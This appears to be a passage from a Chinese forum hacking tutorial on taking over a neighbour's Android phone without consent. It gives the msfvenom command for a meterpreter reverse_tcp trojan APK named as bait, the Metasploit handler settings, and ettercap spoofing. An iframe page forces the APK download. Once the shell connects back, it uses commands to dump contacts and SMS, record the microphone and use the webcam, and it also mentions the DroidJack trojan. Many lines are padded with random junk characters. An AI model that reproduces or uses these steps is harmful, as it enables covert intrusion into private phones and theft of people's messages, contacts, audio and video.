7 A4 ? q: o8 f& J4 m 五、msf+ettercap入侵邻居安卓手机
/ E& V! \' d3 i% v + ^4 p; e+ L: d, k
* [% J7 J6 m [, i, A- @! Y 首先启动msf + `9 d6 f% x2 ?) y5 M) n
. `) R. d" t5 }" D9 n
0 S8 u3 W3 n* K) Z. k 先用kali生成一个安卓木马,如下命令:
& F2 {; w8 f1 ]
3 y9 T3 |+ N# B" w4 c. a& A% k L2 z: c
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 3 R5 t7 }, ] n, p3 e/ K. f
& G$ ^7 ~, U# V6 p5 c7 \
2 [% l: D# O4 S/ { 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
% T7 ^7 o1 B, W* o: P' e $ N* d; f8 @& ]1 _; |
5 w: K7 d5 F6 L3 E g/ R* N
然后进入msf
# A7 R1 m8 S1 m6 ^
7 ]3 [2 u& d9 |4 Z0 n, q: b0 h6 x% E2 F. I v0 q
use exploit/multi/handler
; c( o2 v- ^- u
$ ~! U, Q8 W7 u9 g
9 }$ a2 \( {+ d. A& ]/ s- Z9 K set payload android/meterpreter/reverse_tcp 1 K. K" |, @ b) r
2 t( E! P/ J& J6 }; I7 d$ B5 a5 {, X2 x
set LHOST 192.168.0.109 //ip为kaili的ip
9 Q) w6 P# O) f/ j o* v
: @9 t3 s6 e. }) j& L' v' Z# D2 M: e
5 H, r6 i! L& h, `8 S set LPORT 44444 //端口一定要与前面生成的木马的端口一致
3 W) G' S# Y- P" r Q4 R1 B 1 k" F2 ~9 _0 `) g
' n2 u& }/ {, ^ Exploit % B/ K F% F d; R* L
9 s5 ?' R" O4 I7 r; j }8 ~
( A5 o( \% ^$ U |$ q 0 H- k2 U1 v7 P, v6 D: p
' a" U6 _4 N: W# R. T6 f7 p) q- S
. A7 _! \. k6 G2 f 下面我们开启ettercap -G
1 v1 ]# n. Q5 }: O' W, u% M 3 ~) O6 ~5 C) k+ U) A& h. C
8 a; G. d% b) T! Q 我物理IP为
( l9 K+ P/ J& _' r/ c9 V- V
. t y. d4 I% D% b! O" h
7 N3 f% E/ X# v+ I' W' }
i% R# q( f& k% r 4 a5 o8 m5 X: @3 u5 M* U8 U6 g
8 T" n3 M# W$ _, R
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, L3 u+ z+ _9 f
: Z" g* u, m; L# H8 U" `. H- {% Q$ Z( l' }* b- V4 @. P1 F
下面我们来设置一下
7 o$ U) @$ ^( k; _& t6 e F! B: m$ D J% o
0 b% B' I- e3 J% e% [9 U
8 }4 t* ^' Y/ R+ N9 u # V7 V R* f: S; F+ ?0 d
/ j$ `$ L" j0 d1 j7 X, \* O 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
! H2 N9 S3 D$ }; [# |! B' ~ : i4 e# ^/ H! G
0 l S- n) _9 u. X" ], P/ V4 @9 p
# j- ?0 r4 O4 { 8 n; c4 p* S) v2 M
5 Q7 v8 J- K3 R: n% a. @# a" T 0 k: t2 w% i" S% A( Z
* F% L1 ~, [2 ^$ }7 O0 Y3 c# b
, F, F, I, r- G
8 b I |" F2 h$ c" t % v) F6 ^5 c9 J: s& h! @1 y1 b F; I
4 u; G- r0 l8 \4 x; U+ i( B
! |4 T/ _( @6 N' G8 _- m
4 M7 F3 \- M& ^: F {4 Y: S6 c
! q) g) A' F: u [2 x. V7 T* ] # a6 b9 \2 n1 R' j; }
, C/ n. b+ `9 p* f8 A
$ q5 |. u' r" W& X
) x/ U( ~* H' h& h
3 j- n8 W4 P, p5 \2 I8 E
9 V0 ?. l/ _0 `( W % q# I& n+ w4 i( W( U
' t N8 a; ]( S. S2 Z
2 i$ X2 X/ K& f5 X: B0 H+ A & {6 K( w( g0 D( F! t) \' i
! G; I6 K" H. F9 C: @4 s. U* D V* }
/ ]& z# \+ y1 x0 n* |5 e0 \ # q" f8 L0 \: |0 E8 \( Y
# Q9 o: t' {4 }0 c f( h% @# |3 W& F: |* w8 s0 g
: G' c' o5 {& m3 ^6 }7 Y 4 S# ~; k9 h- [! v' L
8 N0 j& D* f d5 Y5 M6 {
4 M3 ]0 g9 t/ c1 }
* f- D- Y# f5 b2 _0 L0 S8 t# Z S$ o X& @) K% }& Y. d. N4 k/ C% t' v
3 [8 i4 z1 o; ]8 V
" b- A8 f% t; y
8 Q, I/ h2 h7 Z' {
( S5 X/ @: g7 H7 a" ?! k
m* U! l; R+ p& p1 }6 ?, F3 }4 ~* S) I) G( y& `$ f
下面我们开始攻击 1 H8 ~, u2 i% e
; Z( p: l6 n- H; M4 f$ I8 U
K! r, h' E- C& [7 ]7 R: s
) K& ^6 f+ r V6 D4 n/ X# N) W
5 f- v4 L1 l5 m& `, s' q* [; Z- ~) O
g, J3 Y+ E" j/ J1 @6 Y- }
) B& t, |( ^7 Y. `/ H, w3 {, _
& n- s% V% N4 q, P, d* e6 q! i9 L0 v! d# d8 I2 Z1 b3 ?
3 O. W. R' {( Z; l7 ~1 l* P
; K) B8 Z% p7 Q" s: P9 D, t, s0 q; H+ k; T b2 C. M
9 |! r \) \ X, P+ Q1 N
% D7 ]& ]$ {: e4 |9 {; n% z1 y: T$ ~ l/ E5 d4 y. Q
: S9 `! @6 v( X 5 v: y0 A! f, D
6 n6 _. ]$ ] }8 w
大概过了5分钟多,发现反弹成功了 : O7 O% s: T: @4 _* ?
- A) B; I' j7 i
! `1 R' v* N$ `- p! u# v5 o6 g* t7 Z# T
* r3 K3 u: n& T8 f
1 @0 b$ y6 B& g* |0 j. E4 C
. i! G4 w5 C" m& z; W. I+ o) y . h" w' r7 D+ P% D: z' w: H
0 _+ d4 R) b+ `) m; u& W& _$ g. {2 _
& a/ f" m0 u! K! v( @; {5 ^; L
: \+ w3 n2 C. `# v
5 T1 \ ?6 L! E
7 X: A7 j% H- E; T% f
# b/ g$ N, u7 L
7 }0 U, K$ n6 g
" V, p6 d u# }" W4 q7 g
" G& D+ n8 z6 }+ O, ~) c
2 n* n: A: E) Y, C; Y# F
Q; N5 {" t" X$ \
5 Z2 \% l& z# U. E6 M9 g6 G+ e+ _ C' ^8 s- P
/ H( Q/ E3 E; Y/ ?& j2 N& S
; }6 q+ d0 Q- Q3 r% A2 ?9 B- _. @
% e* u: ^! N% L 执行命令 7 V% W9 _$ l* d2 U0 R" h
* [7 }" p7 i" o: ?! r# b
9 n, g1 o& {1 s# N6 C7 Y
1 ~ }. M \5 r) r9 d% O1 @ " R% {7 K9 S8 ^ `( X' L
5 |" F% c, q2 X" M W dump_contacts --》这个是导出电话 ; [! [5 m2 k- P; X2 D; Z- h G2 K
( h* P; A6 s$ j/ U& \% C
2 r0 ?6 D, [/ G9 O& m dump_sms --》这个是导出信息
; N; p+ t/ I$ R* [6 v4 h
+ Q; P, R8 P: P1 ?$ J0 f/ j+ ]/ A; q9 q3 j* M
record_mic Record audio from the default microphone for X seconds * m" _+ Q1 ^& m7 N n: n
$ V) S' V, G5 x! y+ \5 M3 z
2 m. M8 S9 |* k6 H webcam_chat Start a video chat 5 o& M: h/ r2 C9 R0 F/ [- x( D
; B7 a& O2 o" O8 M7 A" y4 E
9 a% U4 Q: Y( I4 B/ M7 k webcam_list List webcams 5 n% ?# x+ H1 |" _! w+ S
. P, {* ]2 ?5 s
7 r& t1 n9 N2 K; f webcam_snap Take a snapshot from the specified webcam
' l- a5 m: c2 ` 5 [) G/ i* B2 ]$ k4 L$ [
0 h- f7 G1 l* Z7 S1 [2 `/ r- K
webcam_stream   lay a video stream from the specified webcam
+ ?4 H( [! H" ^! Y' M, z + \- Z6 ~; g' j$ {9 E9 C
& S8 A: _9 _" m7 j% ^( L0 [4 v3 ^: x
~: M8 U+ n( X& Q , r% o- h, W- `* A% q
) A2 k3 F. N3 |7 _" w; p: j
, q* t9 o% {8 H2 U+ I+ j! I7 k" }
! Y$ _" O" w! W) O, `
3 e+ a U1 W2 f: k$ @
我们打开看一下电话薄, / P% j% k# ^: l3 R
" p# G. j, l2 x0 k, {3 W5 y j
+ J, _4 j: b+ y, `) L" X ! B& P$ [7 L. S7 s3 `& t" `' o+ H+ ]
0 U8 J5 m ?# m6 w' H0 e, E* Y! j& E3 X6 f( X9 x7 Z$ z2 K
' }/ z& d4 ?! X2 Q' M! c & ]( K. W3 T& ?' W+ P9 F
5 u# E& n! T3 I2 }7 S: r : R7 M2 z x% D( Y6 a6 c' z
2 D Q. ^. E* B
6 l4 }. n7 B9 E9 P
4 `+ P* a9 Q: M @+ j
2 M7 T: g2 g. D* C
9 ^& U& U2 v' `% w# _1 I- `$ k, n % r% \9 d7 Z# C* t! Q/ r+ ]6 r
- ~1 s9 L% Z r
% I- e- @+ g' Q+ U& |8 @
5 V/ O0 o" H8 B" a& G
6 V) `' X8 ?% u9 T a1 m9 }% P4 ~% M1 a: N/ ^, Z/ j
我们同时欺骗成DroidJack木马,使用方法如图: ; d. a: D1 T% n, u
6 ?; q5 C3 L, N/ f4 R% J4 P, N! f
) |/ B5 R; |3 X3 Z7 V4 ^
' A' B% y! ]" y/ d# x0 D
; t3 L! h& y8 }% s2 H6 c- w2 q6 f# U' T }
: L0 b4 P$ j) b6 }; b- S
" \" n+ d6 o, g+ w- t) J) t1 T! X D7 v: x8 H
( P1 ~: g d3 W5 W' C+ J
; ~. x. B4 e0 D* q* ~
9 I, | e) S+ q' q2 l8 \* v 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 % t7 Q3 |/ s- M
( n1 B# C i3 A! n' X5 [: l0 a& h$ f- ^% t2 e! P# F1 Y' ^- z0 j
: h- y3 j# t, d: H, m5 T, @- M
6 d+ o9 J6 e6 x# R' o3 r8 e! z: \; N. B, \5 n4 f3 X
8 m. y+ x! x- E. u: K
1 b( \0 O) R- ]/ D7 o, P3 a
: e+ l- F7 \- R% B5 E! s# z) R : ?9 q( n% n' H0 [3 q
6 O" @/ Q; b. P; F
4 K' f _( l2 S3 F9 s

+ E$ I4 R6 s9 a9 h2 n: k3 a, f ! y; l" J7 C3 h1 Z: W" t& e1 z" A
) r4 S' {2 P3 ^4 m; k
' [0 P/ \8 i) U9 o( X; }( z& j |